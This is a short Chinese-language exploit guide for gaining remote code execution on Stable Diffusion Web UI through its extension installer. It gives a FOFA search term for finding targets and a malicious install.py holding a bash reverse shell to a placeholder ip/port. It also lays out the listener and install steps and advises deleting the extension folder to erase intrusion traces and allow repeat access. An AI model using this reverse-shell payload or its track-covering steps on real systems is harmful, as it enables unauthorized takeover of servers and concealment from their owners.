简介
Stable Diffusion Web UI可以通过下载git文件来安装第三方插件,而插件默认通过install.py文件进行相关安装操作。当插件下载完毕后,会自动执行install.py中的代码,因此可以创建一个git仓库,利用该文件进行远程代码执行。
FOFA
Stable Diffusion checkpoint
漏洞利用
创建仓库
创建install.py文件。
写入反弹shell。
import os
os.system("bash -c 'bash -i >& /dev/tcp/ip/port 0>&1' &")
服务器监听
监听端口。
下载恶意文件
在Extensions->Install from URL输入git文件的地址,等待安装。
接收反弹shell
此时服务器会接收到反弹shell,可以进入extensions目录删除与git文件同名的文件夹,消除入侵痕迹并方便再次入侵。
